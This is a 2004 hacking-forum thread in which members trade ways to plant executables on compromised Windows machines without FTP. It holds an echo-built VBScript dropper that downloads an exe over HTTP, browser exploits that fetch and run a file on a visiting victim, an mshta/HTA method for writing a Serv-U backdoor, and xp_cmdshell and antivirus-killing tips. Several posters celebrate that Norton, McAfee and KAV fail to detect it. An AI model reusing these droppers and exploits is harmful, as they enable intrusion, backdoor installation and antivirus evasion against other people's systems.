yes this is a really helpfull script... the AV program won't e a problem.. you can alsways first upload the tlist.exe to see what processes are on, and kill them with kill.exe
boshcash
Feb 10 2004, 08:46 PM
QUOTE (Mik3yZ @ Feb 10 2004, 01:48 PM)
yes this is a really helpfull script... the AV program won't e a problem.. you can alsways first upload the tlist.exe to see what processes are on, and kill them with kill.exe
u cant upload a single file , this is supposed to be the problem
barty32
Feb 11 2004, 04:44 PM
I tested it: it workz very well!
thx
swya
Feb 11 2004, 11:36 PM
I've tried this locally, and my up to date Norton Antivirus 2003 didn't detect or try to stop it. Works great
the script doesn't download the file WINDOWS 2000 . help
i'm getting the same error
but i tested on win98se
freeman
Feb 12 2004, 06:52 PM
you know what, i got this box been up for 2 months now but no ftp or tftp to upload my file. i will continue enjoy looking at it if there is no method to infect it damn
dtDaMan
Feb 12 2004, 10:55 PM
Hi!
Well, on WIN XP GERMAN is works very fine.
NiCe work guy!!!!
DaMan
gephorce
Feb 13 2004, 01:28 AM
Nice Info, Thanks!
ghasedak
Feb 13 2004, 04:46 AM
It isn,t good cod for pcs have Av Anty viruses Promt on Runing scripts.
boshcash
Feb 14 2004, 05:34 AM
again guys some pcs mabe stopped by net stop command , second thing , if someone has errors when running scripts , i think he has missing components , he can use another way , which is echoing a vbs file that creates an exe file without dowenloading (exe is inside vbs) ..
x1`
Feb 16 2004, 07:23 PM
do u guys know a free http host that will host my files , so i can edit to direct to this free host thx if u can help
Killaloop
Feb 17 2004, 12:35 AM
one way that always works (and I mean on about 50 hosts i have tried) is: Write a vb script into a hta file. What does this vbscript do? this vbscript has encoded servu.exe and ini into ASCII. the resulting hta will be about 2.5mb of size. now you put it on a webserver of your choice and run it on your 'target' mshta http:\\bla\bla.hta
wait about 1 minute and your servu is there. just a hint. because most executables get very big when converted to ASCII I recommend you do as I do: What the hta does:
it directly writes a selfcoded ascii to exe converter onto the target (very small one) it creates a ascii txt file on the target (ascii source file for servu) it runs the converter to convert the servu.exe it directly writes the servu.ini
however, because of script warnings I have removed the automatism of directly running the ascii converter. so it will only directly write all needed files onto harddisk and you will start the converter manually. this way NO Antivirus program will say a singe word about my script, since it doesnt launch any program. It works very nice this way for those of you who know what I'm talking about: try it out it works pretty well. for the other: I dont give away my hta files
hope this helped anyone
boshcash
Feb 17 2004, 01:10 AM
yea u r right its a good way , but the problem in hta files that they show a window on the screen but u can also put a script to close it as soon as possible , so the user doesnt notice ..
Killaloop
Feb 17 2004, 01:42 AM
you simple put Close at the end no problem got very nice results doing so end beside ... having internet explorer installed you never wonder about explorer windows poping up ^^
HAnzsz
Feb 17 2004, 10:10 AM
yeah dude~!!
thx very much
this shit is tested and works for me.
for people with problems.. read all replies.. you will understand what you are doing wrong as you see others try it too.
dont forget in sql you must put "exec xp_cmdshell'" in front of it
thought that was the dudes mistake who couldn't echo
Rave4
Feb 17 2004, 01:16 PM
i will try it , today , thanks.
blackwarrior
Feb 19 2004, 10:44 AM
:\ hmmm... nice .. but.. i will continue using ftp -s
Killaloop
Feb 19 2004, 11:11 AM
tftp -s? hehe think you dont understand the point of this topic ^^
how to get your files onto a host when no filetransfertools are left (deleted to secure a box) or if they are blocked by firewall. no flame, just wanted to point this out
o0oKARo0o
Feb 20 2004, 01:37 AM
wow, very nice one, it works fine, very usefull post thanks ten times
metrox
Feb 21 2004, 12:48 PM
thanks for the nice method
DvilleStoner
Feb 21 2004, 01:02 PM
netcat opens a cmd prompt on a certain port if you bind it to the cmd.exe file right?
What is the proper command for this?
ozz
Feb 21 2004, 04:22 PM
thanks a lot, that would be very useful!
DvilleStoner
Feb 21 2004, 05:51 PM
Nevermind, I found it. . .=], great site
Israel
Feb 21 2004, 11:39 PM
Thanx, nice idea
o0oKARo0o
Feb 24 2004, 04:45 AM
this works fine aswell..
CODE
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" data="fichier a telecharger et executer"></object> ]]> </exploit> </security> </xml>
or this one in a webpage that you would create before and then forcing the victim to connect to..
<script> var oPopup = window.createPopup(); function showPopup() { oPopup.document.body.innerHTML = "<object data=fichier a telecharger et executer>"; oPopup.show(0,0,1,1,document.body); } showPopup() </script>
Flapdrol
Feb 26 2004, 10:28 PM
If you get errors try putting spaces after the values for the constants::
yep this one got discovered and patched. nearly needless by now. for better results try my method as described if you know vbs it works and cant be bugfixed since its no bug its a feature of mshta and cant be fixed (like fixing ftp.exe to not let it transfer files) ^^
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" dir /s ca[1].rar copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar del 0QMVC11H\ca[1].rar
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" dir /s ca[1].rar copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar del 0QMVC11H\ca[1].rar
the problem is searching for downloaded file , and the window left open after the file was downloaded
marcoz
Feb 29 2004, 01:46 PM
nice one
tianzhen
Mar 2 2004, 02:37 AM
CODE
echo Dim DataBin>c:\madefile.vbs echo Dim HTTPGET>>c:\madefile.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs echo HTTPGET.Send>>c:\madefile.vbs echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs echo Const adTypeBinary=1>>c:\madefile.vbs echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs echo Dim SendBinary>>c:\madefile.vbs echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs echo SendBinary.Open>>c:\madefile.vbs echo SendBinary.Write DataBin>>c:\madefile.vbs echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs
when i run it got a kav popup , but this worx just fine:
really guys test it if this isnt detected by AVs , i will put this instead of mine , credits will goto tianzhen if it isnt detected by AV , i would be very thankful to u man
I tested it , it works 100% , still didnt test it with AVs though ..
totof
Mar 2 2004, 01:21 PM
Works very well thanks man !! good 2 go!!
FuzZyBeeR
Mar 2 2004, 03:15 PM
Thanx for this. Laways used the old way before
boshcash
Mar 2 2004, 08:44 PM
plzz tell me if tianzhen's way isnt detected or not , if u have tested it , and it doesnt get detected , i will edit main post and add it thanks tianzhen ...
woww . mcafee failed to detect it .. thats nice . i will edit main post
Roby
Mar 4 2004, 01:35 PM
tianzhen mod wasnt detected by NAV latest virus definitions!
Thanx much for this fine way of transfering files!
BuzzDee
Mar 12 2004, 05:53 PM
thianzhen's method is just gr8!!
worx perfectly!!
even with avs installed. norton and mcaffee didnt detect it!!
THX VERY MUCH!! THIX IS AWESOME!!
gerok
Mar 13 2004, 12:09 AM
how would you incorporate this code to an html file (so when people visit a certain webpage, it'll load)? Examples?
worked on my system (XP) and downloaded the file. never tested it to execute the file afterwards(your echo'ing the script from cmd shell, can run the file yourself)
also not detected by my Norton Av corp 8.1
xDD
Mar 13 2004, 11:03 PM
This metod yeah download files but cant execute! Think NOT BINARY MODE then downloaa ...
C:\>program.exe This program must be run under Win32
boshcash
Mar 13 2004, 11:15 PM
the vbs file itself isnt binary , but it downloads binary files from http successfully i tested my computer and other pc , works perfectly with tianhanz's way now its fully undetected !
xDD
Mar 13 2004, 11:35 PM
OK my fault (filtered) source ...
I change www and thats work
archiv
Mar 13 2004, 11:38 PM
CODE
echo Dim DataBin>c:\madefile.vbs echo Dim HTTPGET>>c:\madefile.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs echo HTTPGET.Send>>c:\madefile.vbs echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs echo Const adTypeBinary=1>>c:\madefile.vbs echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs echo Dim SendBinary>>c:\madefile.vbs echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs echo SendBinary.Open>>c:\madefile.vbs echo SendBinary.Write DataBin>>c:\madefile.vbs echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs
hei that's not my name
